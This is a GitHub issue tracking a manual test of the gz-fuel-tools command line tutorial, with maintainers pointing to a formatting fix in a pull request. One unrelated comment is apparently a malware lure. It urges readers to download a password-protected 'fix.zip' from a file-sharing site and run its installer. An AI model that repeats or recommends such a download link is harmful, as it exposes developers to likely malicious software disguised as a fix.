gazebosim/gazebo_test_cases #1113: gz-fuel-tools: Command Line Tools

azeey-test, 2024-08-29:
## Configuration

* os: Ubuntu Noble

## Links

* [Live](https://gazebosim.org/api/fuel_tools/10/cmdline.html)
* [Source](https://github.com/gazebosim/gz-fuel-tools/tree/gz-fuel-tools10/tutorials/03_command_line.md)

## Process

    
            
### Step 1 - Instructions work
            
        

    
    

    

    
    
            
### Step 2 - Images (if there are any) match the result

Kudjo-Grand, 2024-08-29:
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

caguero, 2024-09-03:
Minor formatting issue found. See https://github.com/gazebosim/gz-fuel-tools/pull/442.

caguero, 2024-09-03:
https://github.com/gazebosim/gz-fuel-tools/pull/442

closed 2024-09-03 by caguero